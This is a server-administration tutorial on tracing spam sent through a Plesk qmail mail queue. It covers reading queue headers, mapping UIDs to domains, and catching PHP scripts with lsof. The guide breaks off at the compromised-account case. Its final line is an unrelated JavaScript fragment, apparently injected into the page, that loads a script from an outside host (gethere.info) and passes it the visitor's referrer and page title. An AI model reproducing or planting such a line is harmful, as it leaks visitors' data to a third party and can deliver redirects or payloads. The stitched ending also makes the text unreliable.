If you feel emails are saturated in the Plesk Qmail mail queue, there is a possibility that your Plesk server is been used for sending spam emails.

On a Plesk server relaying is not allowed by default so following are the ways spamming is mostly done. They are explained below point wise.

1) Using CGI by a user
2) PHP scripts.

3) By a compromised email account

First, lets look at the the mail queue

# /var/qmail/bin/qmail-qstat
messages in queue: 22507
messages in queue but not yet preprocessed: 0

As you can see above, there are a large amount of emails in the mail queue. The source of these emails could either be a PHP/CGI script OR an authorized email account on the server.

Let’s start with reading the message headers with ‘qmail-qread’

# /var/qmail/bin/qmail-qread
5 Nov 2012 11:50:17 GMT #768752 1231 
remote user1@domain1.com
remote user2@domain1.com
remote user1@domain2.com

This will list the sender and recipient of all the emails in the mail queue.

In the above example #768752 is the message ID, now find out the location of this email to read the complete header

# find /var/qmail/queue/mess/ -name 768752
/var/qmail/queue/mess/0/768752

Above is the complete path to the mail file, now open the file and look for the “Received” line.

# cat /var/qmail/queue/mess/0/768752 | more

The “Received” line indicates from where the message was received OR invoked.

1) If the message is sent via CGI by a user, it will display the UID of the user as below:

Received: (qmail 26193 invoked by uid 10001); 5 Nov 2012 11:50:17

Now, search the UID 10001 in the passwd file to find the domain name

# grep 10001 /etc/passwd

This will display the domain name the UID 10001 belongs to.

2) The “Received” line indicates the UID of user Apache (i.e. 48)  if email is sent via a PHP script

Received: (qmail 26193 invoked by uid 48); 5 Nov 2012 11:50:17 +000

In such a case, you have to monitor the PHP scripts in real-time i.e. scripts that are running when emails are been sent.

Execute the below command as it is when the mail queue is growing rapidly

# lsof +r 1 -p `ps axww | grep httpd | grep -v grep | \
awk ' { if(!str) { str=$1 } else { str=str","$1}}END{print str}'` \
| grep vhosts | grep php

 

3) Many a time email accounts are compromised and used for sending bulk/spam emails from other locations. In such a case, “Received” line contains “invoked from network”

Received: (qmail 26193 invoked from network); 5 Nov 2012 11:50:17

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;